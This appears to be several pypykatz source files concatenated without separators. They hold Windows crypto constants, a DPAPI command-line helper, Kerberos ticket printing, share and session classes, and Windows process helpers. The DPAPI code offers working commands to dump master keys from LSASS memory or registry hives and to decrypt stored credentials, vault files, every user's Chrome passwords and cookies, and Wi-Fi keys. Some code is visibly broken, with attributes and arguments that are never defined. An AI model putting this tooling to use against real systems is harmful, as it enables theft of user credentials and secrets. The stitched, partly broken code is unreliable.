ALG_SID_RC5                     = 13
ALG_SID_AES_128                 = 14
ALG_SID_AES_192                 = 15
ALG_SID_AES_256                 = 16
ALG_SID_AES                     = 17
ALG_SID_SKIPJACK                = 10
ALG_SID_TEK                     = 11

CRYPT_MODE_CBCI                 = 6       # ANSI CBC Interleaved
CRYPT_MODE_CFBP                 = 7       # ANSI CFB Pipelined
CRYPT_MODE_OFBP                 = 8       # ANSI OFB Pipelined
CRYPT_MODE_CBCOFM               = 9       # ANSI CBC + OF Masking
CRYPT_MODE_CBCOFMI              = 10      # ANSI CBC + OFM Interleaved

ALG_SID_RC2                     = 2
ALG_SID_RC4                     = 1
ALG_SID_SEAL                    = 2

# Diffie - Hellman sub - ids
ALG_SID_DH_SANDF                = 1
ALG_SID_DH_EPHEM                = 2
ALG_SID_AGREED_KEY_ANY          = 3
ALG_SID_KEA                     = 4
ALG_SID_ECDH                    = 5

# Hash sub ids
ALG_SID_MD2                     = 1
ALG_SID_MD4                     = 2
ALG_SID_MD5                     = 3
ALG_SID_SHA                     = 4
ALG_SID_SHA1                    = 4
ALG_SID_MAC                     = 5
ALG_SID_RIPEMD                  = 6
ALG_SID_RIPEMD160               = 7
ALG_SID_SSL3SHAMD5              = 8
ALG_SID_HMAC                    = 9
ALG_SID_TLS1PRF                 = 10
ALG_SID_HASH_REPLACE_OWF        = 11
ALG_SID_SHA_256                 = 12
ALG_SID_SHA_384                 = 13
ALG_SID_SHA_512                 = 14

# secure channel sub ids
ALG_SID_SSL3_MASTER             = 1
ALG_SID_SCHANNEL_MASTER_HASH    = 2
ALG_SID_SCHANNEL_MAC_KEY        = 3
ALG_SID_PCT1_MASTER             = 4
ALG_SID_SSL2_MASTER             = 5
ALG_SID_TLS1_MASTER             = 6
ALG_SID_SCHANNEL_ENC_KEY        = 7
ALG_SID_ECMQV                   = 1

class ALGORITHMS(enum.IntFlag):
    CALG_MD2                = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD2)
    CALG_MD4                = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD4)
    CALG_MD5                = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD5)
    CALG_SHA                = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA)
    CALG_SHA1               = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA1)
    CALG_RSA_SIGN           = (ALG_CLASS_SIGNATURE | ALG_TYPE_RSA | ALG_SID_RSA_ANY)
    CALG_DSS_SIGN           = (ALG_CLASS_SIGNATURE | ALG_TYPE_DSS | ALG_SID_DSS_ANY)
    CALG_NO_SIGN            = (ALG_CLASS_SIGNATURE | ALG_TYPE_ANY | ALG_SID_ANY)
    CALG_RSA_KEYX           = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_RSA|ALG_SID_RSA_ANY)
    CALG_DES                = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_DES)
    CALG_3DES_112           = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_3DES_112)
    CALG_3DES               = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_3DES)
    CALG_DESX               = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_DESX)
    CALG_RC2                = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_RC2)
    CALG_RC4                = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_STREAM|ALG_SID_RC4)
    CALG_SEAL               = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_STREAM|ALG_SID_SEAL)
    CALG_DH_SF              = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_DH_SANDF)
    CALG_DH_EPHEM           = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_DH_EPHEM)
    CALG_AGREEDKEY_ANY      = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_AGREED_KEY_ANY)
    CALG_KEA_KEYX           = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_DH|ALG_SID_KEA)
    CALG_HUGHES_MD5         = (ALG_CLASS_KEY_EXCHANGE|ALG_TYPE_ANY|ALG_SID_MD5)
    CALG_SKIPJACK           = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_SKIPJACK)
    CALG_TEK                = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_TEK)
    CALG_SSL3_SHAMD5        = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SSL3SHAMD5)
    CALG_SSL3_MASTER        = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SSL3_MASTER)
    CALG_SCHANNEL_MASTER_HASH   = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SCHANNEL_MASTER_HASH)
    CALG_SCHANNEL_MAC_KEY   = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SCHANNEL_MAC_KEY)
    CALG_SCHANNEL_ENC_KEY   = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SCHANNEL_ENC_KEY)
    CALG_PCT1_MASTER        = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_PCT1_MASTER)
    CALG_SSL2_MASTER        = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_SSL2_MASTER)
    CALG_TLS1_MASTER        = (ALG_CLASS_MSG_ENCRYPT|ALG_TYPE_SECURECHANNEL|ALG_SID_TLS1_MASTER)
    CALG_RC5                = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_RC5)
    CALG_HMAC               = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC)
    CALG_TLS1PRF            = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_TLS1PRF)
    CALG_HASH_REPLACE_OWF   = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HASH_REPLACE_OWF)
    CALG_AES_128            = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES_128)
    CALG_AES_192            = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES_192)
    CALG_AES_256            = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES_256)
    CALG_AES                = (ALG_CLASS_DATA_ENCRYPT|ALG_TYPE_BLOCK|ALG_SID_AES)
    CALG_SHA_256            = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA_256)
    CALG_SHA_384            = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA_384)
    CALG_SHA_512            = (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA_512)
    CALG_ECDH               = (ALG_CLASS_KEY_EXCHANGE | ALG_TYPE_DH | ALG_SID_ECDH)
    CALG_ECMQV              = (ALG_CLASS_KEY_EXCHANGE | ALG_TYPE_ANY | ALG_SID_ECMQV)
    CALG_ECDSA              = (ALG_CLASS_SIGNATURE | ALG_TYPE_DSS | ALG_SID_ECDSA)
	
ALGORITHMS_DATA = {
    # Algorithm: key/SaltLen, CryptHashModule, Mode, IVLen, BlockSize
    ALGORITHMS.CALG_SHA: (160//8, SHA1, None, None, 512//8),
    ALGORITHMS.CALG_HMAC: (160//8, SHA512, None, None, 512//8),
    ALGORITHMS.CALG_3DES: (192//8, DES3, SYMMETRIC_MODE.CBC, 64//8),
    ALGORITHMS.CALG_SHA_512: (128//8, SHA512, None, None, 1024//8),
    ALGORITHMS.CALG_AES_256: (256//8, AES, SYMMETRIC_MODE.CBC,128//8), #CBC is already in the object...
}
	
	
class FLAGS(enum.IntFlag):
    CRYPTPROTECT_UI_FORBIDDEN = 0x1
    CRYPTPROTECT_LOCAL_MACHINE = 0x4
    CRYPTPROTECT_CRED_SYNC = 0x8
    CRYPTPROTECT_AUDIT = 0x10
    CRYPTPROTECT_VERIFY_PROTECTION = 0x40
    CRYPTPROTECT_CRED_REGENERATE = 0x80
    CRYPTPROTECT_SYSTEM = 0x20000000


from pypykatz.commons.common import UniversalEncoder, hexdump
import argparse
import platform


class DPAPICMDHelper:
	def __init__(self):
		self.live_keywords = ['dpapi']
		self.keywords = ['dpapi']
	
	def add_args(self, parser, live_parser):

		live_subcommand_parser = argparse.ArgumentParser(add_help=False)                                                                                                  
		live_dpapi_subparsers = live_subcommand_parser.add_subparsers(help = 'LIVE DPAPI commands work under the current user context. Except: keys, wifi, chrome')
		live_dpapi_subparsers.required = True
		live_dpapi_subparsers.dest = 'livedpapicommand'
		
		live_keys_parser = live_dpapi_subparsers.add_parser('keys', help = '[ADMIN ONLY]  Dump all local DPAPI related keys. Aggressively. Recommended: use file output. !This takes a while!')
		live_keys_parser.add_argument('--method', choices = ['lsass', 'registry', 'all'], default = 'all', help= 'Where to look for the keys')
		live_keys_parser.add_argument('-o', '--outfile', help= 'Output file base name')

		live_vpol_parser = live_dpapi_subparsers.add_parser('vpol', help = 'Decrypting VPOL file with current user context')
		live_vpol_parser.add_argument('vpolfile', help= 'VPOL file to decrypt')

		live_vcred_parser = live_dpapi_subparsers.add_parser('vcred', help = 'Decrypt VCRED')
		live_vcred_parser.add_argument('vpolfile', help= 'VPOL file to use to decrypt the VCRED file')
		live_vcred_parser.add_argument('vcredfile', help= 'VCRED file to decrypt')
		
		live_cred_parser = live_dpapi_subparsers.add_parser('cred', help = 'Decrypt CRED file')
		live_cred_parser.add_argument('credfile', help= 'CRED file to decrypt')

		
		live_blob_parser = live_dpapi_subparsers.add_parser('blob', help = 'Decrypt raw dpapi blob hex')
		live_blob_parser.add_argument('blob', help= 'blob string in hex format')
		
		live_securestring_parser = live_dpapi_subparsers.add_parser('securestring', help = 'Decrypt securestring hex')
		live_securestring_parser.add_argument('securestring', help= 'securestring in hex format')
		
		live_blobfile_parser = live_dpapi_subparsers.add_parser('blobfile', help = '')
		live_blobfile_parser.add_argument('blobfile', help= 'Decrypt raw dpapi blob in file')
		
		live_securestringfile_parser = live_dpapi_subparsers.add_parser('securestringfile', help = '')
		live_securestringfile_parser.add_argument('securestringfile', help= 'Decrypt securestring from file')

		live_wifi_parser = live_dpapi_subparsers.add_parser('wifi', help = '[ADMIN ONLY] Decrypt stored WIFI passwords')
		live_chrome_parser = live_dpapi_subparsers.add_parser('chrome', help = '[ADMIN ONLY] !TAKES SUPER-LONG! Decrypt all chrome passwords for all users (admin) or for the current user.')


		live_parser.add_parser('dpapi', help='DPAPI (live) related commands. This will use winAPI to decrypt secrets using the current user context.', parents=[live_subcommand_parser])
		

		#offline
		prekey_subcommand_parser = argparse.ArgumentParser(add_help=False)
		dpapi_prekey_subparsers = prekey_subcommand_parser.add_subparsers(help = 'prekey_command')
		dpapi_prekey_subparsers.required = True
		dpapi_prekey_subparsers.dest = 'prekey_command'

		prekey_passwd = dpapi_prekey_subparsers.add_parser('password', help = 'Generate prekeys from password')
		prekey_passwd.add_argument('sid', help='SID of the user')
		prekey_passwd.add_argument('password', help='Password of the user')
		prekey_passwd.add_argument('-o', '--out-file', help= 'Key candidates will be stored in this file. Easier to handle this way in the masterkeyfil command.')

		prekey_nt = dpapi_prekey_subparsers.add_parser('nt', help = 'Generate prekeys from NT hash')
		prekey_nt.add_argument('sid', help='SID of the user')
		prekey_nt.add_argument('nthash', help='NT hash of the user')
		prekey_nt.add_argument('-o', '--out-file', help= 'Key candidates will be stored in this file. Easier to handle this way in the masterkeyfil command.')

		prekey_registry = dpapi_prekey_subparsers.add_parser('registry', help = 'Generate prekeys from registry secrets')
		prekey_registry.add_argument('system', help='SYSTEM hive')
		prekey_registry.add_argument('sam', help='SAM hive')
		prekey_registry.add_argument('security', help='SECURITY hive')
		prekey_registry.add_argument('-o', '--out-file', help= 'Key candidates will be stored in this file. Easier to handle this way in the masterkeyfil command.')
		

		dpapi_group = parser.add_parser('dpapi', help='DPAPI (offline) related commands')
		dpapi_subparsers = dpapi_group.add_subparsers()
		dpapi_subparsers.required = True
		dpapi_subparsers.dest = 'dapi_module'

		dpapi_subparsers.add_parser('prekey', help = 'Prekey generation', parents=[prekey_subcommand_parser])
		
		dpapi_minidump_group = dpapi_subparsers.add_parser('minidump', help='Dump masterkeys and prekeys from minidump file')
		dpapi_minidump_group.add_argument('minidumpfile', help='path to minidump file')
		dpapi_minidump_group.add_argument('-o', '--out-file', help= 'Master and Backup keys will be stored in this file. Easier to handle in other commands.')


		dpapi_masterkey_group = dpapi_subparsers.add_parser('masterkey', help='Decrypt masterkey file')
		dpapi_masterkey_group.add_argument('masterkeyfile', help='path to masterkey file')
		dpapi_masterkey_group.add_argument('prekey', help= 'Path to prekey file, which has multiple decryption key candidates')
		dpapi_masterkey_group.add_argument('-o', '--out-file', help= 'Master and Backup keys will be stored in this file. Easier to handle in other commands.')


		dpapi_credential_group = dpapi_subparsers.add_parser('credential', help='Decrypt credential file')
		dpapi_credential_group.add_argument('mkf', help= 'Keyfile generated by the masterkey -o command.')
		dpapi_credential_group.add_argument('cred', help='path to credential file')

		dpapi_vcred_group = dpapi_subparsers.add_parser('vcred', help='Decrypt vcred file')
		dpapi_vcred_group.add_argument('vcred', help='path to vcred file')
		dpapi_vcred_group.add_argument('--vpolkey', nargs='+', help= 'Key obtained by decrypting the corresponding VPOL file, in hex format. Remember to try both VPOL keys')

		dpapi_vpol_group = dpapi_subparsers.add_parser('vpol', help='Decrypt vpol file')
		dpapi_vpol_group.add_argument('mkf', help= 'Keyfile generated by the masterkey -o command.')
		dpapi_vpol_group.add_argument('vpol', help='path to vpol file')
		
		
		dpapi_securestring_group = dpapi_subparsers.add_parser('securestring', help='Decrypt securestring')
		dpapi_securestring_group.add_argument('mkf', help= 'Keyfile generated by the masterkey -o command.')
		dpapi_securestring_group.add_argument('securestring', help='path to securestring file (hex data expected!), or the securestring in hex form')

		dpapi_blob_group = dpapi_subparsers.add_parser('blob', help='Decrypt blob')
		dpapi_blob_group.add_argument('mkf', help= 'Keyfile generated by the masterkey -o command.')
		dpapi_blob_group.add_argument('blob', help='path to blob file (hex data expected!), or the blob in hex form')

	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			self.run(args)
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
	
	def run(self, args):
		from pypykatz.dpapi.dpapi import DPAPI

		dpapi = DPAPI()

		if args.dapi_module == 'prekey':
			if args.prekey_command == 'registry':
				if args.system is None:
					raise Exception('SYSTEM hive must be specified for registry parsing!')
				if args.sam is None and args.security is None:
					raise Exception('Either SAM or SECURITY hive must be supplied for registry parsing! Best to have both.')

				dpapi.get_prekeys_form_registry_files(args.system, args.security, args.sam)
			
			elif args.prekey_command == 'password':
				if args.sid is None:
					raise Exception('SID must be specified for generating prekey in this mode')
				
				pw = args.password
				if args.password is None:
					import getpass
					pw = getpass.getpass()

				dpapi.get_prekeys_from_password(args.sid, password = pw)
			
			elif args.prekey_command == 'nt':
				if args.nt is None or args.sid is None:
					raise Exception('NT hash and SID must be specified for generating prekey in this mode')

				dpapi.get_prekeys_from_password(args.sid, nt_hash = args.nt)


			dpapi.dump_pre_keys(args.out_file)


		elif args.dapi_module == 'minidump':
			if args.minidumpfile is None:
				raise Exception('minidump file must be specified for mindiump parsing!')
			
			dpapi.get_masterkeys_from_lsass_dump(args.minidumpfile)
			dpapi.dump_masterkeys(args.out_file)
			dpapi.dump_pre_keys(args.out_file + '_prekeys')


		elif args.dapi_module == 'masterkey':
			if args.key is None and args.prekey is None:
				raise Exception('Etieher KEY or path to prekey file must be supplied!')

			if args.prekey:
				dpapi.load_prekeys(args.prekey)
				dpapi.decrypt_masterkey_file(args.mkf)

			if args.key:
				dpapi.decrypt_masterkey_file(args.mkf, bytes.fromhex(args.key))
			
			if len(dpapi.masterkeys) == 0 and len(dpapi.backupkeys) == 0:
				print('Failed to decrypt the masterkeyfile!')
				return

			dpapi.dump_masterkeys(args.out_file)

		elif args.dapi_module == 'credential':
			dpapi.load_masterkeys(args.mkf)
			cred_blob = dpapi.decrypt_credential_file(args.cred)
			
			print(cred_blob.to_text())

		elif args.dapi_module == 'vpol':
			dpapi.load_masterkeys(args.mkf)
			key1, key2 = dpapi.decrypt_vpol_file(args.vpol)

			print('VPOL key1: %s' % key1.hex())
			print('VPOL key2: %s' % key2.hex())


		elif args.dapi_module == 'vcred':
			if args.vpolkey is None or len(args.vpolkey) == 0:
				raise Exception('VPOL key bust be specified!')
			
			dpapi.vault_keys = [bytes.fromhex(x) for x in args.vpolkey] 
			res = dpapi.decrypt_vcrd_file(args.vcred)
			for attr in res:
				for i in range(len(res[attr])):
					if res[attr][i] is not None:
						print('AttributeID: %s Key %s' % (attr.id, i))
						print(hexdump(res[attr][i]))
						
		elif args.dapi_module == 'securestring':
			dpapi.load_masterkeys(args.mkf)
				
			try:
				bytes.fromhex(args.securestring)
			except Exception as e:
				print('Error! %s' %e)
				dec_sec = dpapi.decrypt_securestring_file(args.securestring)
			else:
				dec_sec = dpapi.decrypt_securestring_hex(args.securestring)
			
			print('HEX: %s' % dec_sec.hex())
			print('STR: %s' % dec_sec.decode('utf-16-le'))

		elif args.dapi_module == 'blob':
			dpapi.load_masterkeys(args.mkf)
				
			try:
				bytes.fromhex(args.securestring)
			except Exception as e:
				print('Error! %s' %e)
				dec_sec = dpapi.decrypt_securestring_file(args.securestring)
			else:
				dec_sec = dpapi.decrypt_securestring_hex(args.securestring)
			
			print('HEX: %s' % dec_sec.hex())
			print('STR: %s' % dec_sec.decode('utf-16-le'))

		

	def run_live(self, args):
		if platform.system().lower() != 'windows':
			raise Exception('Live commands only work on Windows!')

		from pypykatz.dpapi.dpapi import DPAPI	
		dpapi = DPAPI(use_winapi=True)

		if args.livedpapicommand == 'keys':
			from pypykatz.dpapi.dpapi import prepare_dpapi_live	
			
			dpapi = prepare_dpapi_live(args.method)
				
			if args.outfile is not None:
				dpapi.dump_pre_keys(args.outfile + '_prekeys')
				dpapi.dump_masterkeys(args.outfile + '_masterkeys')
			else:
				dpapi.dump_pre_keys()
				dpapi.dump_masterkeys()
			
			return

		elif args.livedpapicommand == 'cred':
			cred_blob = dpapi.decrypt_credential_file(args.credfile)
			print(cred_blob.to_text())
				
		elif args.livedpapicommand == 'vpol':
			key1, key2 = dpapi.decrypt_vpol_file(args.vpolfile)
			print('VPOL key1: %s' % key1.hex())
			print('VPOL key2: %s' % key2.hex())

		elif args.livedpapicommand == 'vcred':
			key1, key2 = dpapi.decrypt_vpol_file(args.vpolfile)
			res = dpapi.decrypt_vcrd_file(args.vcredfile)
			for attr in res:
				for i in range(len(res[attr])):
					if res[attr][i] is not None:
						print('AttributeID: %s Key %s' % (attr.id, i))
						print(hexdump(res[attr][i]))

			
		elif args.livedpapicommand == 'securestring':
			dec_sec = dpapi.decrypt_securestring_hex(args.securestring)
			print('HEX: %s' % dec_sec.hex())
			print('STR: %s' % dec_sec.decode('utf-16-le'))

		elif args.livedpapicommand == 'securestringfile':
			data = args.data[0]
			dec_sec = dpapi.decrypt_securestring_file(data)
			print('HEX: %s' % dec_sec.hex())
			print('STR: %s' % dec_sec.decode('utf-16-le'))

		elif args.livedpapicommand == 'blob':
			dec_sec = dpapi.decrypt_securestring_hex(args.blob)
			print('HEX: %s' % dec_sec.hex())

		elif args.livedpapicommand == 'blobfile':
			dec_sec = dpapi.decrypt_securestring_file(args.blobfile)
			print('HEX: %s' % dec_sec.hex())
			
		elif args.livedpapicommand == 'chrome':
			res = dpapi.decrypt_all_chrome_live()
			for file_path, url, user, password in res['logins']:
				print('file: %s user: %s pass: %s url: %s' % (file_path, user, password, url))
			for file_path, host_key, name, path, value in res['cookies']:
				print('file: %s host_key: %s name: %s path: %s value: %s' % (file_path, host_key, name, path, value))

		elif args.livedpapicommand == 'wifi':
			for wificonfig in dpapi.decrypt_wifi_live():
				print('%s : %s' % (wificonfig['name'], wificonfig['key']))




from minikerberos.protocol.asn1_structs import KRB_CRED, EncKrbCredPart, KRBCRED
import base64

def format_kirbi(data, n = 100):
	kd = base64.b64encode(data).decode()
	return '    ' + '\r\n    '.join([kd[i:i+n] for i in range(0, len(kd), n)])

def describe_kirbi_data(data):
	if isinstance(data, bytes):
		kirbi = KRB_CRED.load(data).native
	elif isinstance(data, dict):
		kirbi = data
	elif isinstance(data, KRB_CRED):
		kirbi = data.native
	elif isinstance(data, KRBCRED):
		kirbi = data.native
	else:
		raise Exception('Unknown data type! %s' % type(data))
	
	t = '\r\n'
	for ticket in kirbi['tickets']:
		t += 'Realm        : %s\r\n' % ticket['realm']
		t += 'Sname        : %s\r\n' % '/'.join(ticket['sname']['name-string'])

	if kirbi['enc-part']['etype'] == 0:
		cred = EncKrbCredPart.load(kirbi['enc-part']['cipher']).native
		cred = cred['ticket-info'][0]
		username = cred.get('pname')
		if username is not None:
			username = '/'.join(username['name-string'])
		flags = cred.get('flags')
		if flags is not None:
			flags = ', '.join(flags)

		t += 'UserName     : %s\r\n' % username
		t += 'UserRealm    : %s\r\n' % cred.get('prealm')
		t += 'StartTime    : %s\r\n' % cred.get('starttime')
		t += 'EndTime      : %s\r\n' % cred.get('endtime')
		t += 'RenewTill    : %s\r\n' % cred.get('renew-till')
		t += 'Flags        : %s\r\n' % flags
		t += 'Keytype      : %s\r\n' % cred['key']['keytype']
		t += 'Key          : %s\r\n' % base64.b64encode(cred['key']['keyvalue']).decode()

	t += 'EncodedKirbi : \r\n\r\n'
	t += format_kirbi(KRB_CRED(kirbi).dump())
	return t

def print_kirbi(data):
	print(describe_kirbi_data(data))



def parse_kirbi(kirbifile):
	with open(kirbifile, 'rb') as f:
		print_kirbi(f.read())


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

from pypykatz.commons.winapi.local.sid import SID

class FileInfo:
	def __init__(self):
		self.fid = None
		self.permissions = None
		self.num_locks = None
		self.pathname = None
		self.username = None
		
	@staticmethod
	def from_struct(si, level):
		sess = FileInfo()
		sess.fid = si.fid
		if level == 2:
			return sess
		sess.permissions = si.permissions
		sess.num_locks = si.num_locks
		sess.pathname = si.pathname
		sess.username = si.username
		
		return sess
		
	def to_dict(self):
		return {
			'fid' : str(self.netname),
			'permissions' : str(self.permissions),
			'num_locks' : str(self.num_locks),
			'pathname' : str(self.pathname),
			'username' : str(self.username),
		}
		
	def __str__(self):
		t = '==ShareInfo==\r\n'
		t+= 'netname : %s\r\n' % self.netname
		if self.path:
			t+= 'path : %s\r\n' % self.path
		if self.remark:
			t+= 'remark : %s\r\n' % self.remark
		return t
		
class ShareInfo:
	def __init__(self):
		self.flags = None
		self.netname = None
		self.type = None
		self.remark = None
		self.permissions = None
		self.max_uses = None
		self.current_uses = None
		self.path = None
		self.passwd = None
		self.servername = None
		
	@staticmethod
	def from_struct(si, level):
		sess = ShareInfo()
		sess.netname = si.netname
		if level == 0:
			return sess
		sess.type = si.type
		sess.remark = si.remark
		if level == 1:
			return sess
		
		if level == 501:
			sess.flags = si.flags
			return sess
		
		
		sess.permissions = si.permissions
		sess.max_uses = si.max_uses
		sess.current_uses = si.current_uses
		sess.path = si.path
		sess.passwd = si.passwd
		
		if level != 503:
			return sess
			
		sess.servername = si.servername
		return sess
		
	def to_dict(self):
		return {
			'netname' : str(self.netname),
			'type' : str(self.type),
			'remark' : str(self.remark),
			'flags' : str(self.flags),
			'servername' : str(self.servername),
		}
		
	def __str__(self):
		t = '==ShareInfo==\r\n'
		t+= 'netname : %s\r\n' % self.netname
		if self.path:
			t+= 'path : %s\r\n' % self.path
		if self.remark:
			t+= 'remark : %s\r\n' % self.remark
		return t

class UserSessionInfo:
	def __init__(self):
		self.computername = None
		self.username = None
		self.time = None
		self.idle_time = None
		
	@staticmethod
	def from_session_info(si, level):
		sess = UserSessionInfo()
		sess.computername = si.cname.replace('\\\\','')
		if level == 0:
			return sess
		
		sess.computername = si.cname
		sess.username = si.username
		sess.time = si.time
		sess.idle_time = si.idle_time
		return sess
		
	def to_dict(self):
		return {
			'computername' : str(self.computername),
			'username' : str(self.username),
			'time' : str(self.time),
			'idle_time' : str(self.idle_time),
		}
		
	def __str__(self):
		t = '==Session==\r\n'
		t+= 'computername : %s\r\n' % self.computername
		t+= 'username : %s\r\n' % self.username
		t+= 'time : %s\r\n' % self.time
		t+= 'idle_time : %s\r\n' % self.idle_time
		return t
		
class LocalGroupInfo:
	def __init__(self):
		self.sid = None
		self.sidusage = None
		self.domain = None
		self.username = None
		
	def to_dict(self):
		return {
			'sid' : str(self.sid),
			'sidusage' : str(self.sidusage),
			'domain' : str(self.domain),
			'username' : str(self.username),
		}
		
	def from_struct(lg, level):
		lgi = LocalGroupInfo()
		if level == 0:
			lgi.sid = SID.from_address(lg.sid)
			return lgi
		
		elif level == 1:
			lgi.sid = SID.from_address(lg.sid)
			lgi.sidusage = lg.sidusage
			lgi.username = lg.name
			return lgi
			
		elif level == 2:
			lgi.sid = SID.from_address(lg.sid)
			lgi.sidusage = lg.sidusage
			lgi.domain, lgi.username = lg.domainandname.split('\\')
			return lgi
		
		elif level == 3:
			lgi.sid = SID.from_address(lg.sid)
			lgi.sidusage = lg.sidusage
			lgi.domain, lgi.username = lg.domainandname.split('\\')
			return lgi
		else:
			raise Exception('Unknown struct of type %s passed to LocalGroupInfo' % (type(lg)))
			
	def __str__(self):
		t = '==LocalGroupInfo==\r\n'
		t+= 'sid : %s\r\n' % self.sid
		t+= 'sidusage : %s\r\n' % self.sidusage
		t+= 'domain : %s\r\n' % self.domain
		t+= 'username : %s\r\n' % self.username
		return t


import os
import sys
import ctypes
import enum
import logging

from pypykatz.commons.readers.local.common.kernel32 import *
from pypykatz.commons.readers.local.common.psapi import *

class WindowsMinBuild(enum.Enum):
	WIN_XP = 2500
	WIN_2K3 = 3000
	WIN_VISTA = 5000
	WIN_7 = 7000
	WIN_8 = 8000
	WIN_BLUE = 9400
	WIN_10 = 9800

	
#utter microsoft bullshit commencing..
def getWindowsBuild():   
    class OSVersionInfo(ctypes.Structure):
        _fields_ = [
            ("dwOSVersionInfoSize" , ctypes.c_int),
            ("dwMajorVersion"      , ctypes.c_int),
            ("dwMinorVersion"      , ctypes.c_int),
            ("dwBuildNumber"       , ctypes.c_int),
            ("dwPlatformId"        , ctypes.c_int),
            ("szCSDVersion"        , ctypes.c_char*128)];
    GetVersionEx = getattr( ctypes.windll.kernel32 , "GetVersionExA")
    version  = OSVersionInfo()
    version.dwOSVersionInfoSize = ctypes.sizeof(OSVersionInfo)
    GetVersionEx( ctypes.byref(version) )    
    return version.dwBuildNumber
	
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000

SYNCHRONIZE = 0x00100000

STANDARD_RIGHTS_REQUIRED = DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER
STANDARD_RIGHTS_ALL = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE

if getWindowsBuild() >= WindowsMinBuild.WIN_VISTA.value:
	PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF
else:
	PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF
	

def QueryDosDevice(drive_letter):
    buffer_length = 1024
    buf = ctypes.create_unicode_buffer(buffer_length)
    status = windll.kernel32.QueryDosDeviceW(drive_letter, buf, buffer_length)
    if status == 0:
        raise ctypes.WinError()
    return buf.value


def get_drives():
    drives = []
    bitmask = windll.kernel32.GetLogicalDrives()
    for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        if bitmask & 1:
            drives.append(letter + ':')
        bitmask >>= 1
    return drives

def get_device_prefixes():
    device_prefixes = {}
    drives = get_drives()
    for drive in drives:
        device_prefixes[QueryDosDevice(drive)] = drive
    return device_prefixes

DEVICE_PREFIXES = get_device_prefixes()

WINDOWS_BUILD_NUMBER = getWindowsBuild()
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_VM_READ = 0x0010
MAXIMUM_ALLOWED = 33554432
STATUS_INFO_LENGTH_MISMATCH = -1073741820
MAX_PATH_UNICODE = 1 << 15

# Get full normalized image path of a process using NtQuerySystemInformation
# It doesn't need any special privileges
def get_process_full_imagename(pid):
    _NtQuerySystemInformation = windll.ntdll.NtQuerySystemInformation
    image_filename = ''
    buf = ctypes.create_unicode_buffer(0x1000)
    process_info = SYSTEM_PROCESS_ID_INFORMATION()
    process_info.ProcessId = ctypes.c_void_p(pid)
    process_info.ImageName.MaximumLength = len(buf)
    process_info.ImageName.Buffer = addressof(buf)
    status = _NtQuerySystemInformation(
        SystemProcessIdInformation,
        process_info,
        sizeof(process_info),
        None)
    if status == STATUS_INFO_LENGTH_MISMATCH:
        buf = ctypes.create_unicode_buffer(MAX_PATH_UNICODE)
        process_info.ImageName.MaximumLength = len(buf)
        process_info.ImageName.Buffer = addressof(buf)
        status = _NtQuerySystemInformation(
            SystemProcessIdInformation,
            process_info,
            sizeof(process_info),
            None)
    if status == 0:
        image_filename = str(process_info.ImageName.Buffer)
        if image_filename.startswith('\\Device\\'):
            for win_path in DEVICE_PREFIXES:
                if image_filename.startswith(win_path):
                    image_filename = DEVICE_PREFIXES[win_path] + image_filename[len(win_path):]
    else:
        image_filename = 'N/A'
    return image_filename

